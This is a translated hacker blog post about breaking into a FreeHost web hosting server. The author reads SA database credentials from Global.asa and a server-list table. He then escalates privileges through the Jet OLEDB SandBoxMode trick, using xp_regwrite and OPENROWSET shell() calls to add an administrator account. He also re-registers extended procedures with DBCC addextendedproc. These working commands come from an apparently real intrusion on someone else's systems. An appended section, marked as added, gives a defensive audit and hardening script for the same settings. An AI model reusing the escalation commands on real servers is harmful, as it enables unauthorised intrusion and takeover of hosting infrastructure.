BY: Angel wings
BLOG: Http://hi.baidu.com/hack078
First published on T00ls
Today a friend of mine got a SHELL from the main site of a Xingwai (FreeHost) host.
I don't know how he did it. Permissions were all locked down and all the useful components had been deleted; only ASP shells were supported, and with no write or modify permissions at all. I have no idea how he got the SHELL.
That's not the point, though. His webshell was a bit flaky and he didn't like using it,
but luckily I found the database connection string in Global.asa. The account wasn't SA, but its password was the same as SA's. I wanted to escalate directly. I didn't want to delete any components, and I wasn't used to this SHELL.
Commands couldn't be executed, and the SHELL had no write or modify permissions. Headache. So I connected directly through the SQL query feature built into the SHELL
and looked at the tables and such.
SELECT * FROM [FreeHost_Serversqllist]
This table yielded some data:
the SA accounts of all his servers, the local one included. Now this was getting interesting, but it was still too early to celebrate. Next I wanted to escalate with a UDF, but I had no write permission. Ugh.
What to do? I thought it over and checked which hosts were active on the machine; maybe it wasn't a dedicated server.
SELECT * FROM [FreeHost_Product_Host]
Not many sites showed up, but I still had to look through more than 300 of them. I found one on the same server. I had no write permission to directories outside it, so I went straight in over FTP: I found a website and uploaded the UDF through FTP. I thought it was done, but the UDF could not be exported.
I figured it was the reduced privileges. I asked in the group: well, the way Xingwai configures permissions, it just doesn't work.
After more than an hour of this I still wasn't disheartened.
Actually I had taken a detour. I remembered the SA sandbox escalation.
Then I tried it, but xp_cmdshell and the other components had all been deleted.
After some Baidu searching I found how to restore xp_cmdshell, but the command still failed to execute and I didn't know why; later it turned out to be a problem with the webshell.
So I didn't go the sandbox route; instead I found a new method on Baidu:
Executing commands under SA when xp_cmdshell and xplog70.dll are unavailable.
Http://www.4shell.org/archives/242.html
This method requires xp_regwrite.
First, enable the sandbox mode:
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 1
Then run system commands through Jet OLEDB:
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'SELECT shell("cmd.exe /c net user admin /add")')
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'SELECT shell("cmd.exe /c net localgroup administrators admin /add")')
It reported that the procedure could not be found.
DBCC addextendedproc ('xp_regread', 'xpstar.dll')
DBCC addextendedproc ('xp_regwrite', 'xpstar.dll')
I restored them, and the privilege escalation succeeded.
But when adding the user to the administrators group
I typed the command wrong and thought the admin had renamed the administrators group. It was half a day before I found out.
My writing isn't great. Well, after spending half a day on this, I realize I got carried away in the text above.
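An added audit and hardening script for the conditions this sandbox trick depends on; it is my own example, not code from the post or from the 4shell articles. It assumes a sysadmin connection and SQL Server 2005 or later (for sys.configurations); the SandBoxMode value meanings are Microsoft's documented ones for that Jet key.

```sql
-- Added example (not from the original post). Run as sysadmin.
-- Checks the settings the Jet sandbox escalation relies on and, in the
-- last block, puts them back to safe values.
SET NOCOUNT ON;

-- 1. Jet SandBoxMode. Per Microsoft's documentation of this key: 0 and 1
--    disable the sandbox for non-Access callers such as SQL Server, so
--    shell() inside a Jet query runs; 2 and 3 (the default) keep it on.
--    On 64-bit Windows the 32-bit Jet key sits under SOFTWARE\Wow6432Node.
DECLARE @sandbox INT;
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', @sandbox OUTPUT;
SELECT 'SandBoxMode' AS setting, @sandbox AS value,
       CASE WHEN @sandbox IN (0, 1) THEN 'UNSAFE' ELSE 'ok' END AS verdict;

-- 2. Server options the trick needs: OPENROWSET with an ad hoc provider
--    requires 'Ad Hoc Distributed Queries'; xp_cmdshell is the classic route.
SELECT name AS setting, CAST(value_in_use AS INT) AS value,
       CASE WHEN CAST(value_in_use AS INT) = 1 THEN 'UNSAFE' ELSE 'ok' END AS verdict
FROM sys.configurations
WHERE name IN ('Ad Hoc Distributed Queries', 'xp_cmdshell');

-- 3. Registered registry/shell extended procedures. Dropping them is not a
--    real control: the post shows a sysadmin re-adding xp_regwrite with
--    DBCC addextendedproc, so sysadmin membership is the actual boundary.
SELECT name AS registered_xp
FROM master.sys.all_objects
WHERE type = 'X'
  AND name IN ('xp_cmdshell', 'xp_regwrite', 'xp_regread', 'xp_regdeletevalue');

-- 4. Who holds sysadmin. The post's real foothold was a web application
--    login whose password matched SA's; any such login shows up here.
SELECT name AS sysadmin_login, type_desc, is_disabled
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
  AND IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- 5. Remediation: restore the default sandbox value and turn the options off.
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE',
    'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 3;
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

The configuration changes only close this particular path; the application login sharing SA's password is what needs fixing first.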
Http://www.4shell.org/archives/242.html
Http://www.4shell.org/archives/1718.html
These two articles will be useful to you.
Show the results